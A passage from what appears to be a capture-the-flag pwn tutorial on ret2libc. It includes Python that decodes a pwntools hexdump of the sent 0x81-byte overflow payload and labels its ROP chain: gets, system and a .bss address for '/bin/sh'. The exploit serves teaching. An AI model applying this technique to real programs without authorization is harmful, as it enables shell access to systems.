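# when it loads ./ret2libc2, and the hexdump of the 0x81 bytes sent.
PLT_LOG = """\
[DEBUG] PLT 0x8048450 printf
[DEBUG] PLT 0x8048460 gets
[DEBUG] PLT 0x8048480 puts
[DEBUG] PLT 0x8048490 system
[DEBUG] PLT 0x80484d0 setvbuf
"""

SENT_HEXDUMP = """\
00000000  61 61 61 61 62 61 61 61 63 61 61 61 64 61 61 61  │aaaa│baaa│caaa│daaa│
00000010  65 61 61 61 66 61 61 61 67 61 61 61 68 61 61 61  │eaaa│faaa│gaaa│haaa│
00000020  69 61 61 61 6a 61 61 61 6b 61 61 61 6c 61 61 61  │iaaa│jaaa│kaaa│laaa│
00000030  6d 61 61 61 6e 61 61 61 6f 61 61 61 70 61 61 61  │maaa│naaa│oaaa│paaa│
00000040  71 61 61 61 72 61 61 61 73 61 61 61 74 61 61 61  │qaaa│raaa│saaa│taaa│
00000050  75 61 61 61 76 61 61 61 77 61 61 61 78 61 61 61  │uaaa│vaaa│waaa│xaaa│
00000060  79 61 61 61 7a 61 61 62 62 61 61 62 63 61 61 62  │yaaa│zaab│baab│caab│
00000070  60 84 04 08 90 84 04 08 80 a0 04 08 80 a0 04 08  │`···│····│····│····│
00000080  0a                                               │·│
00000081
"""

PADDING = 0x70           # offset of main's saved return address (section 2.5)
BSS_ADDR = 0x0804A080    # writable .bss slot the exploit fills with "/bin/sh"


def parse_plt(log):
    """Map PLT stub address -> symbol from '[DEBUG] PLT <addr> <name>' lines."""
    return {int(addr, 16): name
            for addr, name in re.findall(r"\[DEBUG\] PLT (0x[0-9a-f]+) (\S+)", log)}


def parse_hexdump(dump):
    """Rebuild raw bytes from pwntools hexdump rows: '<offset>  <hex bytes>  │ascii│'."""
    data = bytearray()
    for line in dump.splitlines():
        fields = line.split("│")[0].split()      # drop the ASCII column
        if not fields:
            continue
        offset, hexbytes = int(fields[0], 16), fields[1:]
        if offset != len(data):
            raise ValueError("non-contiguous hexdump row at %#x" % offset)
        data.extend(bytes.fromhex("".join(hexbytes)))
    return bytes(data)


def annotate_chain(payload, padding, plt, writable):
    """Label every 4-byte little-endian slot that follows the padding.

    Slot 0 replaces main's return address; slot 1 is the return address of the
    function reached there; slot 2 is that function's first argument (and the
    junk return address of the next one); slot 3 is the next function's argument."""
    chain = []
    for off in range(padding, len(payload) - 3, 4):
        (value,) = struct.unpack("<I", payload[off:off + 4])
        label = plt.get(value) or writable.get(value) or "unknown"
        chain.append((off, value, label))
    return chain


def explain_sent_payload():
    payload = parse_hexdump(SENT_HEXDUMP)
    chain = annotate_chain(payload, PADDING, parse_plt(PLT_LOG), {BSS_ADDR: "bss"})
    return payload, chain


if __name__ == "__main__":
    payload, chain = explain_sent_payload()
    print("%d bytes sent, padding %#x" % (len(payload), PADDING))
    for off, value, label in chain:
        print("  +%#04x  %#010x  %s" % (off, value, label))
```

The four labelled slots read gets, system, bss, bss: exactly the `p32(gets_addr) + p32(sys_addr) + p32(bss_addr) + p32(bss_addr)` of section 3.2, with the trailing 0x0a being the newline sendline appends.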
4. References
【PWN】ret2libc | Wolf Group Security Team (狼组安全团队) public knowledge base